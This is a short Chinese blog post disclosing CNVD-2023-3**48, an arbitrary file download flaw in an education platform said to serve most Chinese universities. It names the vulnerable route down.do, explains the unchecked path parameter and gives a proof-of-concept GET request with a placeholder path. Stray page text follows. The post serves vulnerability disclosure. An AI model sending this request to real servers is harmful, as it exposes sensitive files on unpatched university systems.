CNVD-2023-3**48

某平台任意文件下载，攻击者可利用该漏洞下载系统敏感信息，影响范围涉及全国大部分高校，现已修复。

漏洞分析

漏洞位于文件 WEB-INF/classes/com/fh/controller/theorytest/teacher/Exammanage.class

down 方法，路由是 /teacher/resourcemanager/exam/exammanage/down.do

获取 path 参数，拼接成 realPath ,然后用输出流写出文件。

漏洞复现

POC

GET /teacher/resourcemanager/exam/exammanage/down.do?path=xxxx（文件路径） HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close

Airz's Blog

I haven't read it yet, but I bet it's a lot.

CNVD-2023-3**48

漏洞分析

漏洞复现